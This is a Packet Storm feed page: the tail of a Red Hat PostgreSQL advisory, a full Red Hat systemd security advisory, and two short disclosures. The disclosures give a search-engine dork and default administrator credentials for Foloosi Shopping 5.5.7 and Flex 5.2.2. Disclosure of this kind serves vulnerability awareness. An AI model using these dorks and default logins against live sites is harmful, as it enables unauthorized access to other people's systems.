postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm

ppc64le:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm

s390x:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm

x86_64:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2625  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i99zjgjWX9erEAQiXbA//WFJNDVuYD112PQg6wO+FY9ee3L4eDa7x  
XIuCvIpVe6MxugA85cM0/h6NyvsUM7PyZC0aH/QU2uN2yDVgYr39xLNexocHvxAR  
EFiJOZhK+24uBxc9bfm+jVNqtbVOjkzhScUwjNtP5W4QZbBxzgPPTb0Ybzd9ixvk  
GV8DifcjfX1edlBCqV78Hx1P1ISSMipKeTs5HtHsAZ4uK53anrdqZASe2yVy/FVr  
D/s1DeKfWh/AF/6w5JNWB+MWgsQzOnoXH25agzJAE91+uewLk1XWIm3ky7efSYny  
2QwuNCseR5IL1rdaSCgIZY1+khyc1qMk9MxRUs54bJzWi8OMJXvsN08I8gsngrxV  
Nf27NQfMx9KjIkMo/+cV93rWHzhsjzM0uNb1CrJvBNtr5xWfIsD4vTiSJIP91hpY  
hBqo8+1pI6Wo66dQkrLDrSo7gdmcLegE56GEAZtwEMPyraXcvb5qToM4OVW8kiVE  
4Kw7CGodi864kesB6ZCKPY7vr68/OjOkWhvbqtbQ1D9kz1UvzRMAAF0meP5fA//s  
PLidab430BWeGd1UagqkQVVBSZ+TTD+oOJwIb+dJBTYpZnEkIuNe4h7eHFW1PTLn  
dCR2CI6UsDUzMPS6bjklqaGEFxCLZpn2c7xzyKhcvOwmhEJEm0UWIAZZNk5ip4b0  
C67oezmmLbg=  
=GaKj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0113-01

Red Hat Security Advisory 2023-0100-01 - The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: systemd security and bug fix update  
Advisory ID:       RHSA-2023:0100-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0100  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-3821   
=====================================================================

1. Summary:

An update for systemd is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The systemd packages contain systemd, a system and service manager for  
Linux, compatible with the SysV and LSB init scripts. It provides  
aggressive parallelism capabilities, uses socket and D-Bus activation for  
starting services, offers on-demand starting of daemons, and keeps track of  
processes using Linux cgroups. In addition, it supports snapshotting and  
restoring of the system state, maintains mount and automount points, and  
implements an elaborate transactional dependency-based service control  
logic. It can also work as a drop-in replacement for sysvinit.

Security Fix(es):

* systemd: buffer overrun in format_timespan() function (CVE-2022-3821)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* ShutdownWatchdogSec value is not taken into account on reboot  
(BZ#2127170)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2127170 - ShutdownWatchdogSec value is not taken into account on reboot [rhel-8.7.0.z]  
2139327 - CVE-2022-3821 systemd: buffer overrun in format_timespan() function

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
systemd-239-68.el8_7.1.src.rpm

aarch64:  
systemd-239-68.el8_7.1.aarch64.rpm  
systemd-container-239-68.el8_7.1.aarch64.rpm  
systemd-container-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-debugsource-239-68.el8_7.1.aarch64.rpm  
systemd-devel-239-68.el8_7.1.aarch64.rpm  
systemd-journal-remote-239-68.el8_7.1.aarch64.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-libs-239-68.el8_7.1.aarch64.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-pam-239-68.el8_7.1.aarch64.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-tests-239-68.el8_7.1.aarch64.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-udev-239-68.el8_7.1.aarch64.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.aarch64.rpm

ppc64le:  
systemd-239-68.el8_7.1.ppc64le.rpm  
systemd-container-239-68.el8_7.1.ppc64le.rpm  
systemd-container-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-debugsource-239-68.el8_7.1.ppc64le.rpm  
systemd-devel-239-68.el8_7.1.ppc64le.rpm  
systemd-journal-remote-239-68.el8_7.1.ppc64le.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-libs-239-68.el8_7.1.ppc64le.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-pam-239-68.el8_7.1.ppc64le.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-tests-239-68.el8_7.1.ppc64le.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-udev-239-68.el8_7.1.ppc64le.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.ppc64le.rpm

s390x:  
systemd-239-68.el8_7.1.s390x.rpm  
systemd-container-239-68.el8_7.1.s390x.rpm  
systemd-container-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-debugsource-239-68.el8_7.1.s390x.rpm  
systemd-devel-239-68.el8_7.1.s390x.rpm  
systemd-journal-remote-239-68.el8_7.1.s390x.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-libs-239-68.el8_7.1.s390x.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-pam-239-68.el8_7.1.s390x.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-tests-239-68.el8_7.1.s390x.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-udev-239-68.el8_7.1.s390x.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.s390x.rpm

x86_64:  
systemd-239-68.el8_7.1.i686.rpm  
systemd-239-68.el8_7.1.x86_64.rpm  
systemd-container-239-68.el8_7.1.i686.rpm  
systemd-container-239-68.el8_7.1.x86_64.rpm  
systemd-container-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-container-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-debugsource-239-68.el8_7.1.i686.rpm  
systemd-debugsource-239-68.el8_7.1.x86_64.rpm  
systemd-devel-239-68.el8_7.1.i686.rpm  
systemd-devel-239-68.el8_7.1.x86_64.rpm  
systemd-journal-remote-239-68.el8_7.1.x86_64.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-libs-239-68.el8_7.1.i686.rpm  
systemd-libs-239-68.el8_7.1.x86_64.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-pam-239-68.el8_7.1.x86_64.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-tests-239-68.el8_7.1.x86_64.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-udev-239-68.el8_7.1.x86_64.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3821  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i9NzjgjWX9erEAQjKXg//akCX8D/qkLQEtcWYa0m9aXlkPwsCWkPY  
ScbAPZer9Pq8Nc+F9QTwuQoip+4iZ9nmUzOfqBllp81JMnn2gzT0y3NZWNNxZvaX  
1zMyUo7kA+tBDUL0PkMjchNRU/JWAlL962jXmUnuFMRoNyjFuccvodCvalSTuH2q  
eleJ+ClSVqPyusDbzNsXT/00d9ee7IFDTvmxUaf5jDpT6kUH3h/P4QtfQPLR7WL1  
/khIvs0r6FKaSqjYrhkeo9DYCo/VDzWmKL3FbY4ZY3EiEtbbwGrgPa4PSAxNIH7x  
8UKhzMRi22bcqIpdFxdcWaMGzl0vTeJHbHx3BgPtCGFldivlu6DBth0iRMbOpQsH  
zZu6/W8rOBbFw1hX2vfOKgSt3EcP08BCvOYq+5m+kUONPpbkDa4E8VtbEb8Tl/FV  
CdhNOhQTT4XTa2hrxYI/0H26i2C/m3YZyGpm2XzsrZtQLEatFjI1HDR6nPdeNNsF  
HxuYxr5ac8LCTDbg1hgRtjj2bVQvoCV5PwbbA82Q7h4kRuuoN1iedq/p+7hhPVjh  
cQlPK6ivq4txHCz0R0azo4yA6lIBM4CwxtjdWjEqAt85Wr3cW3WpOO3g0KCrPPRO  
M/Knn7fxDWbusU+m1mp6CM6A1ITmWcUvtJHhwD8dv1SjXwHIWwHPlD7TiI2Y3icZ  
I8bFgejxn4U=  
=QrfL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0100-01

Foloosi Shopping version 5.5.7 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : Foloosi Shopping v5.5.7 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://www.foloosishopping.com/                                                                                   |  | # Dork      : "category/beauty-health-hair"                                                                                      |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin@example.com  & pass=123456 [+] https://127.0.0.1/loginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Foloosi Shopping 5.5.7 Insecure Settings

Flex version 5.2.2 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : Flex Version: 5.22 Insecure Settings Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://csimmobiliere.com                                                                                          |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=botble  & pass=159357 [+] https://127.0.0.1/Flex/admin/loginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Source

Packet Storm